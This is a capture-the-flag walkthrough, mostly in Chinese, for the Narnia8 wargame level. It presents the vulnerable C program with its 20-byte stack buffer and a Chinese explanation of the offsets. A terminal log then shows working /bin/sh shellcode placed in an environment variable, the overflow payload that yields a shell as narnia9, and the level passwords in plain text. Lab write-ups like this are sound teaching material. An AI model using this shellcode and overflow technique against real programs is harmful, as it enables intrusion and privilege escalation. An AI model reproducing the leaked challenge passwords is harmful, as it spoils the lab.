narnia8

/** narnia8.c */

/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am 
// making "i" global unti i find a fix 
// -morla 
int i; 

void func(char *b){
	char *blah=b;
	char bok[20];
	//int i=0;
	
	memset(bok, '\0', sizeof(bok));
	for(i=0; blah[i] != '\0'; i++)
		bok[i]=blah[i];

	printf("%s\n",bok);
}

int main(int argc, char **argv){
        
	if(argc > 1)       
		func(argv[1]);
	else    
	printf("%s argument\n", argv[0]);

	return 0;
}

/** nar.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am 
// making "i" global unti i find a fix 
// -morla 
int i; 

void func(char *b){
	char *blah=b;
	char bok[20];
	//int i=0;
	
        printf("%p\n", blah);
	memset(bok, '\0', sizeof(bok));
	for(i=0; blah[i] != '\0'; i++)
		bok[i]=blah[i];

	printf("%s\n",bok);
}

int main(int argc, char **argv){
        
	if(argc > 1)       
		func(argv[1]);
	else    
	printf("%s argument\n", argv[0]);

	return 0;
}

棧環境

blah存儲着一個指針， 指針指向argv[1]， 這個argv參數是在main函數之前壓棧的， 所以下面我們計算這個地址時， 不需要處理對齊的情況

這個argv1 字符串參數 必須把func結束後eip地址替換掉， 既圖的最上面的eip的值

那麼從bok開始我們要覆蓋的數據是 20B + 4B + 12B + 4B

前一個4B是blah本來的值， 後一個4B是 存儲shellcode的環境變量EGG的值

通過運行 narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xff\xff\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU�n��

可以推算出 /narnia/narnia8 的blah的值爲0xffffd7b4 - 0x14 = 0xffffd7a0

這裏計算偏移和narnia4不同 narnia4的偏移爲0x10 是因爲計算的是buffer的地址， 這個地址是main函數中16字節對齊之後的結果

而此處的偏移爲0x14 既 strlen("/narnia/narnia8") * 2 - strlen("./nar")  * 2 是因爲我要得到的值是argv[1]的地址， 這個地址是在main函數之前壓棧的

這時候還沒有經過main函數的16字節對齊處理, 所以相差20個字節

如果是對齊的情況， 就是相差 16個字節 （15 * 2 對齊到 32） (5 * 2 對齊到 16） 32 - 16 = 16

root@today:~# ssh [email protected]

[email protected]'s password: mohthuphog

narnia8@melinda:~$ cd /tmp/shadowcoder8

narnia8@melinda:/tmp/shadowcoder8$ ls
env  env.c  nar  nar.c  narnia8  narnia8.c  sleep.sh

narnia8@melinda:/tmp/shadowcoder8$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')

narnia8@melinda:/tmp/shadowcoder8$ gcc nar.c  -o nar -m32 -z execstack -fno-stack-protector

narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xff\xff\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU�n��

narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xb4\xd7\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUUabcd����
Segmentation fault

narnia8@melinda:/tmp/shadowcoder8$ /narnia/narnia8 `python -c 'print "U"*20 + "\xa0\xd7\xff\xff" + "U"*12 + "abcd"'`
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUUabcd����
Segmentation fault

narnia8@melinda:/tmp/shadowcoder8$ gcc env.c -o env -m32

narnia8@melinda:/tmp/shadowcoder8$ ./env EGG /narnia/narnia8
0xffffd8a3

narnia8@melinda:/tmp/shadowcoder8$ /narnia/narnia8 `python -c 'print "U"*20 + "\xa0\xd7\xff\xff" + "U"*12 + "\xa3\xd8\xff\xff"'`
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUU��������
$ whoami
narnia9
$ cat /etc/narnia_pass/narnia9
eiL5fealae
$